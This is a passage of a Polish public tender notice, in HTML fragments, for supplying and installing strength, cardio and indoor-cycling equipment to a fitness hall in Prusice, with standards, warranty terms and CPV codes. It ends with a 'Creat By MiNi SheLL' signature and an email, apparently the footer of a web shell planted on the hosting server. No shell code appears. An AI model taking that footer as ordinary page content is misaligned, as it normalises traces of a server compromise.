-ławka regulowane ze stojakami
-ławka odwrotnie skośna regulowana
-stojak na gryfy i krążki
-stojak do przysiadów z zabezpieczeniem
-sztangielki chromowane 1-10 kg ze stojakiem
-ławka ze stojakami do trójboju
-gryf łamany l-1220 mm
-gryf olimpijski l-2200 mm
-gryf prosty l-1500 mm
-gryf sztangielki z tulejami o 50,l- 540
-gryf z obłym wygięciem
-obciążniki talerzowe
-zaciski
-Zestaw sztangielek 2-36kg ze stojakami
3.	Szczegółowy zakres i wymagania asortymentu zawarte są w wykazie sprzętu stanowiący załącznik nr 1a, 1b oraz 1c do niniejszej SIWZ, które wypełnione w zależności od części, na którą Wykonawca składa ofertę należy dołączyć do formularza ofertowego.
4.	Wykonawca w zakresie przedmiotu zamówienia zapewnia transport oraz montaż sprzętu do Sali fitness w budynku na działce ewidencyjnej nr 225 AM-1, obręb Prusice.
5.	Dostarczony sprzęt musi spełniać określone w wykazie normy bezpieczeństwa zgodnie z obowiązującymi przepisami prawa, w szczególności PN-EN 957-1:2006, PN-EN 957-2:2005, PN-EN 957-4:2007, PN-EN 957-8:2007, PN-EN 913:199.
6.	Zamawiający zastrzega sobie prawo odmowy odbioru przedmiotu zamówienia, jeżeli wśród urządzeń wchodzących w skład zestawu danej części znajdowały się będą urządzenia w innej linii kolorystycznej lub stylistycznej oraz stwierdzenia nienależytego wykonania umowy z konsekwencjami będącymi następstwem nienależytego wykonania.
7.	Wykonawca zobowiązany jest do zapewnienia bezpłatnego w ramach wyceny serwisu gwarancyjnego w poniższym zakresie:
1)	pierwszy w 30 dniu od daty odbioru całości sprzętu
2)	drugi w 90 dniu od daty odbioru całości sprzętu,
3)	przez okres trwania gwarancji w zależności od danego sprzętu, co najmniej 2 razy w roku na zgłoszenie zapotrzebowania przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 37.44.19.00-0, 37.44.20.00-8, 37.44.23.00-8, 37.44.24.00-8, 37.44.29.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Maszyny cardio.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2)	Część II Maszyny cardio, według poniższego opisu: 
a) Urządzenia muszą stanowić jednolity zestaw maszyn profesjonalnych urządzeń przeznaczonych do pracy w klubach fitness - nielimitowana ilość godzin i intensywności pracy,
b) Celem zachowania jednolitej obsługi serwisowej oraz obsługi samych urządzeń przez użytkowników Zamawiający wymaga, aby urządzenia wchodzące w skład zestawu były wykonane w jednej linii kolorystycznej oraz stylistycznej na przykład pochodziły od jednego producenta.
c) Wszystkie oferowane urządzenia muszą posiadać deklarację zgodności i/lub certyfikat zgodności znak CE. Do dostawy należy dołączyć dokumenty potwierdzające spełnianie wymagań Zamawiającego w tym zakresie.
d)Na maszynach regenerowanych nie może być widoczny jakikolwiek ślad wcześniejszego użytkowania.
e)Wykonawca jest zobowiązany do przeprowadzenia szkolenia z obsługi klienta oraz przeszkolenia pracowników (3 os.) z użytkowania sprzętu cardio. Szkolenie zostanie przeprowadzone pod kątem zakupionego przez Zamawiającego  przedmiotu zamówienia oraz ma obejmować przeszkolenie pracowników w zakresie wykorzystania wszelkich funkcjonalności dostarczonego sprzętu. Dla potrzeb postępowania Zamawiający zakłada, że szkolenie obejmie grupę, co najmniej 3 osób. 

f) Spis maszyn siłowych:
-2 bieżnie nowe z ekranem dotykowym 19
-2 bieżnie regenerowane z wizualizacją biegu 2d
-2 rowery pionowe regenerowane
-2 rowery poziome regenerowane
-2 maszyny eliptyczne regenerowane
-2 ergometry nowe
3.	Szczegółowy zakres i wymagania asortymentu zawarte są w wykazie sprzętu stanowiący załącznik nr 1a, 1b oraz 1c do niniejszej SIWZ, które wypełnione w zależności od części, na którą Wykonawca składa ofertę należy dołączyć do formularza ofertowego.
4.	Wykonawca w zakresie przedmiotu zamówienia zapewnia transport oraz montaż sprzętu do Sali fitness w budynku na działce ewidencyjnej nr 225 AM-1, obręb Prusice.
5.	Dostarczony sprzęt musi spełniać określone w wykazie normy bezpieczeństwa zgodnie z obowiązującymi przepisami prawa, w szczególności PN-EN 957-1:2006, PN-EN 957-2:2005, PN-EN 957-4:2007, PN-EN 957-8:2007, PN-EN 913:199.
6.	Zamawiający zastrzega sobie prawo odmowy odbioru przedmiotu zamówienia, jeżeli wśród urządzeń wchodzących w skład zestawu danej części znajdowały się będą urządzenia w innej linii kolorystycznej lub stylistycznej oraz stwierdzenia nienależytego wykonania umowy z konsekwencjami będącymi następstwem nienależytego wykonania.
7.	Wykonawca zobowiązany jest do zapewnienia bezpłatnego w ramach wyceny serwisu gwarancyjnego w poniższym zakresie:
1)	pierwszy w 30 dniu od daty odbioru całości sprzętu
2)	drugi w 90 dniu od daty odbioru całości sprzętu,
3)	przez okres trwania gwarancji w zależności od danego sprzętu, co najmniej 2 razy w roku na zgłoszenie zapotrzebowania przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.11.00-2, 37.44.14.00-5, 37.44.29.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Maszyny Indoor Cycling.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III Maszyny Indoor Cycling, według poniższego opisu: 
a)Urządzenia muszą stanowić jednolity zestaw maszyn profesjonalnych urządzeń przeznaczonych do pracy w klubach fitness - nielimitowana ilość godzin i intensywności pracy.
b)Celem zachowania jednolitej obsługi serwisowej oraz obsługi samych urządzeń przez użytkowników Zamawiający wymaga, aby urządzenia wchodzące w skład zestawu były wykonane w jednej linii kolorystycznej oraz stylistycznej na przykład pochodziły od jednego producenta.
c)Wszystkie oferowane urządzenia muszą posiadać deklarację zgodności i/lub certyfikat zgodności znak CE. Do dostawy należy dołączyć dokumenty potwierdzające spełnianie wymagań Zamawiającego w tym zakresie.
d)Wykonawca jest zobowiązany do przeprowadzenia szkolenia bassic dla osoby wskazanej przez Zmawiającego. Szkolenie zostanie przeprowadzone pod kątem zakupionego przez Zamawiającego  przedmiotu zamówienia oraz ma obejmować przeszkolenie pracownika w zakresie wykorzystania wszelkich funkcjonalności dostarczonego sprzętu. 

e)Spis maszyn Indoor Cycling:
-15 rowerów dla uczestników
-2 rowery dla instruktorów
-2 Krankcycle
-1 konsola z oprogramowaniem umożliwiająca wyświetlanie wizualizacji trasy oraz prowadzenia zajęć za pomocą wirtualnego trenera
3.	Szczegółowy zakres i wymagania asortymentu zawarte są w wykazie sprzętu stanowiący załącznik nr 1a, 1b oraz 1c do niniejszej SIWZ, które wypełnione w zależności od części, na którą Wykonawca składa ofertę należy dołączyć do formularza ofertowego.
4.	Wykonawca w zakresie przedmiotu zamówienia zapewnia transport oraz montaż sprzętu do Sali fitness w budynku na działce ewidencyjnej nr 225 AM-1, obręb Prusice.
5.	Dostarczony sprzęt musi spełniać określone w wykazie normy bezpieczeństwa zgodnie z obowiązującymi przepisami prawa, w szczególności PN-EN 957-1:2006, PN-EN 957-2:2005, PN-EN 957-4:2007, PN-EN 957-8:2007, PN-EN 913:199.
6.	Zamawiający zastrzega sobie prawo odmowy odbioru przedmiotu zamówienia, jeżeli wśród urządzeń wchodzących w skład zestawu danej części znajdowały się będą urządzenia w innej linii kolorystycznej lub stylistycznej oraz stwierdzenia nienależytego wykonania umowy z konsekwencjami będącymi następstwem nienależytego wykonania.
7.	Wykonawca zobowiązany jest do zapewnienia bezpłatnego w ramach wyceny serwisu gwarancyjnego w poniższym zakresie:
1)	pierwszy w 30 dniu od daty odbioru całości sprzętu
2)	drugi w 90 dniu od daty odbioru całości sprzętu,
3)	przez okres trwania gwarancji w zależności od danego sprzętu, co najmniej 2 razy w roku na zgłoszenie zapotrzebowania przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.13.00-4, 37.44.00.00-4, 37.44.29.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com